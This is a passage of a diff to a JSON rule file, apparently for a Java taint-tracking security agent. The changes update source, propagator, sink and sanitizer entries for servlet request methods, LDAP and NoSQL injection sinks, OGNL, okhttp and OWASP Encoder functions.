"", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.BufferedReader.(java.io.Reader,int)" + "value": "javax.servlet.ServletRequest.getParameter(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.io.BufferedReader.readLine()" + "value": "javax.servlet.ServletRequest.getParameterMap()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.ByteArrayInputStream.(byte[])" + "value": "javax.servlet.ServletRequest.getParameterNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "java.io.ByteArrayInputStream.(byte[],int,int)" - }, - { - "command": "REMOVE()", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.reset()" + "value": "javax.servlet.ServletRequest.getParameterValues(java.lang.String)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.toByteArray()" - }, + "value": "javax.servlet.ServletRequest.getReader()" + } + ], + "enable": 1, + "type": 2, + "value": "javax.servlet.ServletRequest" + }, + { + "details": [ { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString()" + "value": "jakarta.servlet.ServletRequest.getParameterMap()" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString(int)" + "value": "jakarta.servlet.http.HttpServletRequest.getCookies()" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString(java.lang.String)" + "value": "jakarta.servlet.http.HttpServletRequest.getHeader(java.lang.String)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "http-token-limited-chars" + ], "target": "R", "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString(java.nio.charset.Charset)" + "value": "jakarta.servlet.http.HttpServletRequest.getHeaderNames()" }, { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.write(byte[],int,int)" + "value": "jakarta.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.CharArrayReader.(char[])" + "value": "jakarta.servlet.http.HttpServletRequest.getParameter(java.lang.String)" }, { - "command": "INSERT(0,P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.CharArrayReader.(char[],int,int)" + "value": "jakarta.servlet.http.HttpServletRequest.getPart(java.lang.String)" }, { - "command": "INSERT(0,P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], - "target": "P1", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.CharArrayReader.read(char[],int,int)" + "value": "jakarta.servlet.http.HttpServletRequest.getParts()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site", + "xss-encoded" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.FileReader.(java.io.File)" + "value": "jakarta.servlet.http.HttpServletRequest.getQueryString()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "http-token-limited-chars", + "xss-encoded" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.InputStream.(java.io.InputStream)" + "value": "jakarta.servlet.http.HttpServletRequest.getRequestedSessionId()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "R", "track": "false", "untags": [], - "value": "java.io.InputStream.read(byte[])" + "value": "jakarta.servlet.http.Part.getContentType()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "P1", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.InputStream.read(byte[],int,int)" + "value": "jakarta.servlet.http.Part.getHeader(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], - "target": "P1", + "tags": [ + "http-token-limited-chars" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.InputStream.transferTo(java.io.OutputStream)" + "value": "jakarta.servlet.http.Part.getHeaderNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.InputStreamReader.(java.io.InputStream)" + "value": "jakarta.servlet.http.Part.getHeaders(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.InputStreamReader.(java.io.InputStream,java.lang.String)" + "value": "jakarta.servlet.http.Part.getInputStream()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.InputStreamReader.(java.io.InputStream,java.nio.charset.Charset)" + "value": "jakarta.servlet.http.Part.getName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], "tags": [], - "target": "P1", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "java.io.InputStreamReader.read(char[],int,int)" + "value": "jakarta.servlet.http.Part.getSubmittedFileName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "java.io.ObjectInputStream.(java.io.InputStream)" + "value": "javax.servlet.http.HttpServletRequest.getCookies()" }, { - "command": "INSERT(0,P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "false", - "untags": [], - "value": "java.io.PipedInputStream.read(byte[],int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.PipedInputStream.receive(byte[],int,int)" + "value": "javax.servlet.http.HttpServletRequest.getHeader(java.lang.String)" }, { - "command": "INSERT(0,P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "http-token-limited-chars" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.PipedReader.read(char[],int,int)" + "value": "javax.servlet.http.HttpServletRequest.getHeaderNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.PipedReader.receive(char[],int,int)" + "value": "javax.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.PushbackInputStream.(java.io.InputStream,int)" + "value": "javax.servlet.http.HttpServletRequest.getPart(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], - "target": "P1", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.PushbackInputStream.read(byte[],int,int)" + "value": "javax.servlet.http.HttpServletRequest.getParts()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], - "target": "P1", + "tags": [ + "cross-site", + "xss-encoded" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.Reader.read(char[])" + "value": "javax.servlet.http.HttpServletRequest.getQueryString()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], - "target": "P1", + "tags": [ + "http-token-limited-chars", + "xss-encoded" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.Reader.transferTo(java.io.Writer)" + "value": "javax.servlet.http.HttpServletRequest.getRequestedSessionId()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "java.io.StringReader.(java.lang.String)" - }, - { - "command": "KEEP()", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "java.io.StringWriter.toString()" + "value": "javax.servlet.http.Part.getContentType()" }, { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.StringWriter.write(char[],int,int)" + "value": "javax.servlet.http.Part.getHeader(java.lang.String)" }, { - "command": "APPEND()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "http-token-limited-chars" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.StringWriter.write(java.lang.String)" + "value": "javax.servlet.http.Part.getHeaderNames()" }, { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "java.io.StringWriter.write(java.lang.String,int,int)" + "value": "javax.servlet.http.Part.getHeaders(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.net.Socket.(java.lang.String,int)" + "value": "javax.servlet.http.Part.getInputStream()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.net.Socket.getOutputStream()" + "value": "javax.servlet.http.Part.getName()" }, { - "command": "REMOVE()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "org.apache.commons.io.output.ByteArrayOutputStream.reset()" - }, + "value": "javax.servlet.http.Part.getSubmittedFileName()" + } + ], + "enable": 1, + "type": 2, + "value": "javax.servlet.http.HttpServletRequest" + }, + { + "details": [ { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "org.apache.commons.io.output.ByteArrayOutputStream.write(byte[],int,int)" + "value": "java.sql.Connection.nativeSQL(java.lang.String)" } ], "enable": 1, "type": 1, - "value": "io" + "value": "jdbc" }, { "details": [ @@ -6746,118 +6681,158 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.bind.JAXBElement.getValue()" + "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream)" + "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],jakarta.naming.directory.SearchControls)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream,java.lang.String)" + "value": "jakarta.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P2", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.InputStream)" + "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],javax.naming.directory.SearchControls)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P2", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.Reader)" + "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,javax.naming.directory.SearchControls)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(javax.xml.transform.Source)" + "value": "javax.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,java.lang.Object[],javax.naming.directory.SearchControls)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.InputSource)" - }, - { - "command": "", + "value": "javax.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,javax.naming.directory.SearchControls)" + } + ], + "enable": 1, + "type": 4, + "value": "ldap-injection" + }, + { + "details": [ + { + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.XMLReader,org.xml.sax.InputSource)" + "value": "com.mongodb.DB.doEval(java.lang.String,java.lang.Object[])" + } + ], + "enable": 1, + "type": 4, + "value": "nosql-injection" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.opensymphony.xwork2.util.ValueStack.findString(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "javax.xml.transform.sax.SAXSource.setInputSource(org.xml.sax.InputSource)" + "value": "com.opensymphony.xwork2.util.ValueStack.findValue(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.opensymphony.xwork2.util.ValueStack.findValue(java.lang.String,java.lang.Class)" }, { "command": "", @@ -6867,10 +6842,10 @@ "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.File)" + "value": "ognl.Ognl.parseExpression(java.lang.String)" }, { "command": "", @@ -6883,7 +6858,7 @@ "target": "O", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream)" + "value": "ognl.OgnlParser.(java.io.InputStream)" }, { "command": "", @@ -6896,7 +6871,7 @@ "target": "O", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream,java.lang.String)" + "value": "ognl.OgnlParser.(java.io.Reader)" }, { "command": "", @@ -6909,25 +6884,25 @@ "target": "O", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader)" + "value": "ognl.OgnlParser.(ognl.OgnlParserTokenManager)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader,java.lang.String)" + "value": "ognl.OgnlParser.topLevelExpression()" } ], "enable": 1, "type": 1, - "value": "javax" + "value": "ognl" }, { "details": [ @@ -6935,62 +6910,68 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P2", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getInputStream()" - }, + "value": "com.squareup.okhttp.RequestBody.create(com.squareup.okhttp.MediaType,byte[],int,int)" + } + ], + "enable": 1, + "type": 1, + "value": "okhttp" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameter(java.lang.String)" + "value": "okhttp3.RequestBody$Companion.create(byte[],okhttp3.MediaType,int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P2", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameterNames()" + "value": "okhttp3.RequestBody$Companion.create(okhttp3.MediaType,byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "P2", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameterValues(java.lang.String)" - }, + "value": "okhttp3.RequestBody.create(okhttp3.MediaType,byte[],int,int)" + } + ], + "enable": 1, + "type": 1, + "value": "okhttp3" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, @@ -6998,20 +6979,25 @@ "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getReader()" - }, + "value": "org.apache.commons.fileupload.FileItem.getString()" + } + ], + "enable": 1, + "type": 1, + "value": "org.apache.commons.fileupload.FileItem" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [ "cross-site" @@ -7019,44 +7005,47 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getInputStream()" - }, + "value": "org.apache.commons.fileupload.FileUploadBase.parseRequest(org.apache.commons.fileupload.RequestContext)" + } + ], + "enable": 1, + "type": 2, + "value": "org.apache.commons.fileupload.FileUploadBase" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getParameter(java.lang.String)" + "value": "org.springframework.http.server.ServletServerHttpRequest.getBodyFromServletRequestParameters(jakarta.servlet.http.HttpServletRequest)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "all", + "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getParameterMap()" + "value": "org.springframework.http.server.ServletServerHttpRequest.getBodyFromServletRequestParameters(javax.servlet.http.HttpServletRequest)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ "cross-site" @@ -7064,7 +7053,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getParameterNames()" + "value": "org.springframework.web.bind.annotation.support.HandlerMethodInvoker.resolvePathVariable(java.lang.String,org.springframework.core.MethodParameter,org.springframework.web.context.request.NativeWebRequest,java.lang.Object)" }, { "command": "", @@ -7079,27 +7068,25 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getParameterValues(java.lang.String)" + "value": "org.springframework.web.servlet.mvc.method.annotation.PathVariableMethodArgumentResolver.resolveName(java.lang.String,org.springframework.core.MethodParameter,org.springframework.web.context.request.NativeWebRequest)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getReader()" + "value": "org.springframework.web.util.pattern.PathPattern.getPatternString()" } ], "enable": 1, "type": 2, - "value": "javax.servlet.ServletRequest" + "value": "org.springframework.web.method.support.HandlerMethodArgumentResolver" }, { "details": [ @@ -7107,164 +7094,188 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "xml-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameterMap()" + "untags": [ + "xml-decoded" + ], + "value": "org.apache.taglibs.standard.util.EscapeXML.escape(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], - "tags": [], + "tags": [ + "html-encoded" + ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getCookies()" + "untags": [ + "html-decoded" + ], + "value": "org.owasp.encoder.Encode.forHtml(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "html-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getHeader(java.lang.String)" + "untags": [ + "html-decoded" + ], + "value": "org.owasp.encoder.Encode.forHtmlAttribute(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [ - "http-token-limited-chars" + "html-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getHeaderNames()" + "untags": [ + "html-decoded" + ], + "value": "org.owasp.encoder.Encode.forHtmlContent(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "html-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" - }, - { + "untags": [ + "html-decoded" + ], + "value": "org.owasp.encoder.Encode.forHtmlUnquotedAttribute(java.lang.String)" + }, + { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "url-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getParameter(java.lang.String)" + "untags": [ + "url-decoded" + ], + "value": "org.owasp.encoder.Encode.forUri(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "url-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getPart(java.lang.String)" + "untags": [ + "url-decoded" + ], + "value": "org.owasp.encoder.Encode.forUriComponent(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "xml-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getParts()" + "untags": [ + "xml-decoded" + ], + "value": "org.owasp.encoder.Encode.forXml(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site", - "xss-encoded" + "xml-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getQueryString()" + "untags": [ + "xml-decoded" + ], + "value": "org.owasp.encoder.Encode.forXmlAttribute(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "http-token-limited-chars", - "xss-encoded" + "xml-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getRequestedSessionId()" + "untags": [ + "xml-decoded" + ], + "value": "org.owasp.encoder.Encode.forXmlComment(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], - "tags": [], + "tags": [ + "xml-encoded" + ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.Part.getContentType()" + "untags": [ + "xml-decoded" + ], + "value": "org.owasp.encoder.Encode.forXmlContent(java.lang.String)" }, { "command": "", @@ -7274,27 +7285,31 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "html-decoded" ], "target": "R", "track": "false", - "untags": [], - "value": 